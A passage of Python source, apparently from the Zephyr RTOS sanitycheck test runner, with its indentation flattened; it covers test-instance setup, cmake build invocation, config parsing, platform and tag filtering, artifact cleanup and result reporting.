_subcases, warnings = self.scan_file(filename)
if warnings:
logger.error("%s: %s" % (filename, warnings))
if _subcases:
subcases += _subcases
except ValueError as e:
logger.error("%s: can't find: %s" % (filename, e))
return subcases
def parse_subcases(self, test_path):
results = self.scan_path(test_path)
for sub in results:
name = "{}.{}".format(self.id, sub)
self.cases.append(name)
if not results:
self.cases.append(self.id)
def __str__(self):
return self.name
class TestInstance(DisablePyTestCollectionMixin):
"""Class representing the execution of a particular TestCase on a platform
@param test The TestCase object we want to build/execute
@param platform Platform object that we want to build and run against
@param base_outdir Base directory for all test results. The actual
out directory used is <outdir>/<platform>/<test case name>
"""
def __init__(self, testcase, platform, outdir):
self.testcase = testcase
self.platform = platform
self.status = None
self.reason = "Unknown"
self.metrics = dict()
self.handler = None
self.outdir = outdir
self.name = os.path.join(platform.name, testcase.name)
self.build_dir = os.path.join(outdir, platform.name, testcase.name)
self.build_only = True
self.run = False
self.results = {}
def __lt__(self, other):
return self.name < other.name
# Global testsuite parameters
def check_build_or_run(self, build_only=False, enable_slow=False, device_testing=False, fixtures=[]):
# right now we only support building on windows. running is still work
# in progress.
if os.name == 'nt':
self.build_only = True
self.run = False
return
_build_only = True
# we asked for build-only on the command line
if build_only or self.testcase.build_only:
self.build_only = True
self.run = False
return
# Do not run slow tests:
skip_slow = self.testcase.slow and not enable_slow
if skip_slow:
self.build_only = True
self.run = False
return
runnable = bool(self.testcase.type == "unit" or \
self.platform.type == "native" or \
self.platform.simulation in ["nsim", "renode", "qemu"] or \
device_testing)
if self.platform.simulation == "nsim":
if not find_executable("nsimdrv"):
runnable = False
if self.platform.simulation == "renode":
if not find_executable("renode"):
runnable = False
# console harness allows us to run the test and capture data.
if self.testcase.harness in [ 'console', 'ztest']:
# if we have a fixture that is also being supplied on the
# command-line, then we need to run the test, not just build it.
fixture = self.testcase.harness_config.get('fixture')
if fixture:
if fixture in fixtures:
_build_only = False
else:
_build_only = True
else:
_build_only = False
elif self.testcase.harness:
_build_only = True
else:
_build_only = False
self.build_only = not (not _build_only and runnable)
self.run = not self.build_only
return
def create_overlay(self, platform, enable_asan=False, enable_coverage=False, coverage_platform=[]):
# Create this in a "sanitycheck/" subdirectory otherwise this
# will pass this overlay to kconfig.py *twice* and kconfig.cmake
# will silently give that second time precedence over any
# --extra-args=CONFIG_*
subdir = os.path.join(self.build_dir, "sanitycheck")
os.makedirs(subdir, exist_ok=True)
file = os.path.join(subdir, "testcase_extra.conf")
with open(file, "w") as f:
content = ""
if self.testcase.extra_configs:
content = "\n".join(self.testcase.extra_configs)
if enable_coverage:
if platform.name in coverage_platform:
content = content + "\nCONFIG_COVERAGE=y"
content = content + "\nCONFIG_COVERAGE_DUMP=y"
if enable_asan:
if platform.type == "native":
content = content + "\nCONFIG_ASAN=y"
f.write(content)
def calculate_sizes(self):
"""Get the RAM/ROM sizes of a test case.
This can only be run after the instance has been executed by
MakeGenerator, otherwise there won't be any binaries to measure.
@return A SizeCalculator object
"""
fns = glob.glob(os.path.join(self.build_dir, "zephyr", "*.elf"))
fns.extend(glob.glob(os.path.join(self.build_dir, "zephyr", "*.exe")))
fns = [x for x in fns if not x.endswith('_prebuilt.elf')]
if len(fns) != 1:
raise BuildError("Missing/multiple output ELF binary")
return SizeCalculator(fns[0], self.testcase.extra_sections)
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "failed"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
ldflags = "-Wl,--fatal-warnings"
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
# fixme: add additional cflags based on options
cmake_args = [
'-B{}'.format(self.build_dir),
'-S{}'.format(self.source_dir),
'-DEXTRA_CFLAGS="-Werror ',
'-DEXTRA_AFLAGS=-Wa,--fatal-warnings',
'-DEXTRA_LDFLAGS="{}'.format(ldflags),
'-G{}'.format(self.generator)
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "failed"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-sanitycheck.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
dts_path = os.path.join(self.build_dir, "zephyr", self.platform.name + ".dts.pre.tmp")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(dts_path):
edt = edtlib.EDT(dts_path, [os.path.join(ZEPHYR_BASE, "dts", "bindings")],
warn_reg_unit_address_mismatch=False)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
def process(self, message):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
results = self.cmake()
if self.instance.status == "failed":
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in results['filter'] and results['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
results = self.build()
if not results:
self.instance.status = "failed"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
if results.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
pipeline.put({
"op": "report",
"test": self.instance,
"state": "executed",
"status": self.instance.status,
"reason": self.instance.reason}
)
# Report results and output progress to screen
elif op == "report":
with report_lock:
self.report_out()
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
self.cleanup_artifacts()
def cleanup_artifacts(self):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
whitelist = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
whitelist = [os.path.join(self.instance.build_dir, file) for file in whitelist]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in whitelist:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def report_out(self):
total_tests_width = len(str(self.suite.total_tests))
self.suite.total_done += 1
instance = self.instance
if instance.status in ["failed", "timeout"]:
self.suite.total_failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
self.suite.total_skipped += 1
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
else:
status = Fore.GREEN + "PASSED" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
self.suite.total_done, total_tests_width, self.suite.total_tests, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
self.suite.total_done,
self.suite.total_tests,
Fore.RESET,
int((float(self.suite.total_done) / self.suite.total_tests) * 100),
Fore.YELLOW if self.suite.total_skipped > 0 else Fore.RESET,
self.suite.total_skipped,
Fore.RESET,
Fore.RED if self.suite.total_failed > 0 else Fore.RESET,
self.suite.total_failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if (self.testcase.extra_configs or self.coverage or
self.asan):
overlays.append(os.path.join(instance.build_dir,
"sanitycheck", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
results = self.run_cmake(args)
return results
def build(self):
results = self.run_build(['--build', self.build_dir])
return results
def run(self):
instance = self.instance
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class BoundedExecutor(concurrent.futures.ThreadPoolExecutor):
"""BoundedExecutor behaves as a ThreadPoolExecutor which will block on
calls to submit() once the limit given as "bound" work items are queued for
execution.
:param bound: Integer - the maximum number of items in the work queue
:param max_workers: Integer - the size of the thread pool
"""
def __init__(self, bound, max_workers, **kwargs):
super().__init__(max_workers)
# self.executor = ThreadPoolExecutor(max_workers=max_workers)
self.semaphore = BoundedSemaphore(bound + max_workers)
def submit(self, fn, *args, **kwargs):
self.semaphore.acquire()
try:
future = super().submit(fn, *args, **kwargs)
except Exception:
self.semaphore.release()
raise
else:
future.add_done_callback(lambda x: self.semaphore.release())
return future
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "sanity_chk", "testcase-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_whitelist": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_whitelist": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_whitelist": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk",
"sanity_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.platforms = []
self.selected_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_tests = 0 # number of test instances
self.total_cases = 0 # number of test cases
self.total_done = 0 # tests completed
self.total_failed = 0
self.total_skipped = 0
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
self.cv = threading.Condition()
# hardcoded for now
self.connected_hardware = []
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update(self):
self.total_tests = len(self.instances)
self.total_cases = len(self.testcases)
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.info("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def misc_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage <
(footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics['handler_time']:
run += 1
if self.total_tests and self.total_tests != self.total_skipped:
pass_rate = (float(self.total_tests - self.total_failed - self.total_skipped) / float(
self.total_tests - self.total_skipped))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} tests passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
self.total_tests - self.total_failed - self.total_skipped,
self.total_tests - self.total_skipped,
Fore.RESET,
pass_rate,
Fore.RED if self.total_failed else Fore.RESET,
self.total_failed,
Fore.RESET,
self.total_skipped,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
if self.platforms:
logger.info("In total {} test cases were executed on {} out of total {} platforms ({:02.2f}%)".format(
self.total_cases,
len(self.selected_platforms),
self.total_platforms,
(100 * len(self.selected_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} tests executed on platforms, \
{Fore.RED}{self.total_tests - run}{Fore.RESET} tests were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed):
if not self.instances:
return
if name:
report_name = name
else:
report_name = "sanitycheck"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False, append=only_failed)
self.xunit_report(filename + "_report.xml", full_report=True, append=only_failed)
self.csv_report(filename + ".csv")
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
logger.debug("Found platform configuration " + file)
try:
platform = Platform()
platform.load(file)
if platform.sanitycheck:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain = os.environ.get("ZEPHYR_TOOLCHAIN_VARIANT", None) or \
os.environ.get("ZEPHYR_GCC_VARIANT", None)
if toolchain == "gccarmemb":
# Remove this translation when gccarmemb is no longer supported.
toolchain = "gnuarmemb"
try:
if not toolchain:
raise SanityRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, dirnames, filenames in os.walk(root, topdown=True):
logger.debug("scanning %s" % dirpath)
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
dirnames[:] = []
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = SanityConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_whitelist = tc_dict["arch_whitelist"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_whitelist = tc_dict["platform_whitelist"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_whitelist = tc_dict["toolchain_whitelist"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_from_file(self, file, filter_status=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
instance = TestInstance(self.testcases[test], platform, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
device_testing_filter = kwargs.get('device_testing')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
else:
platforms = self.platforms
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platforms:
instance = TestInstance(tc, plat, self.outdir)
instance.check_build_or_run(
self.build_only,
self.enable_slow,
self.device_testing,
self.fixtures
)
if device_testing_filter:
for h in self.connected_hardware:
if h['platform'] == plat.name:
if tc.harness_config.get('fixture') in h.get('fixtures', []):
instance.build_only = False
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = "Platform is excluded on command line."
continue
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if device_testing_filter and instance.build_only:
discards[instance] = "Not runnable on device"
continue
if tc.skip:
discards[instance] = "Skip filter"
continue
if tc.build_on_all and not platform_filter:
platform_filter = []
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = "Command line testcase tag filter"
continue
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = "Command line testcase exclude filter"
continue
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = "Testcase name filter"
continue
if arch_filter and plat.arch not in arch_filter:
discards[instance] = "Command line testcase arch filter"
continue
if not force_platform:
if tc.arch_whitelist and plat.arch not in tc.arch_whitelist:
discards[instance] = "Not in test case arch whitelist"
continue
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = "In test case arch exclude"
continue
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = "In test case platform exclude"
continue
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = "In test case toolchain exclude"
continue
if platform_filter and plat.name not in platform_filter:
discards[instance] = "Command line platform filter"
continue
if tc.platform_whitelist and plat.name not in tc.platform_whitelist:
discards[instance] = "Not in testcase platform whitelist"
continue
if tc.toolchain_whitelist and toolchain not in tc.toolchain_whitelist:
discards[instance] = "Not in testcase toolchain whitelist"
continue
if not plat.env_satisfied:
discards[instance] = "Environment ({}) not satisfied".format(", ".join(plat.env))
continue
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and tc.type != 'unit':
discards[instance] = "Not supported by the toolchain"
continue
if plat.ram < tc.min_ram:
